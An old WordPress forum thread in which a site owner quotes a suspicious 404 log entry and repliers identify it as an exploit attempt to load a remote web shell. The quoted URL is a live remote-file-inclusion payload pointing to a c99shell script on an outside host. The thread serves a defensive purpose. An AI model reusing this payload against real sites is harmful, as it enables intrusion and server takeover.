Is my WordPress site being hacked?

  • sumeetjain

    (@sumeetjain)


    16 years ago

    I’m getting some users visiting non-existent pages on my site, but I think they’re attempting to hack it.

    One of the 404 visits I see in my analytics is:

    https://sumeetjain.com/treasures/?_SERVER%5BDOCUMENT_ROOT%5D=https://xakforum.altnet.ru/tmp_upload/files/c99shell.txt?

    My site is sumeetjain.com, so that’s okay. A long time ago, I had a directory called treasures, so that’s okay. But a Google search for that text file at the end of the URL string returns a bunch of hacking-related websites.

    I don’t understand any of the contents of the text file (I went to it directly to read into it.), so I’d really appreciate someone’s assistance. I suppose my main questions are:

    1. Is this a genuine attempt at hacking?
    2. Should I be worried, or is WordPress secure?
    3. If WordPress isn’t secure, what can I do to ensure it’s not hacked?

    Obviously, I can’t stop people from trying to hack by entering the URL. I just want to make sure they’re unsuccessful.

    Thanks for your time and help.

Viewing 2 replies - 1 through 2 (of 2 total)
  • whooami

    (@whooami)

    that’s an exploit attempt, yes.

    UseShots

    (@useshots)

    They seemed to be trying to upload a remote web shell script to your site. I guess old versions of WordPress were vulnerable to this sort of attacks.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Is my WordPress site being hacked?’ is closed to new replies.

Tags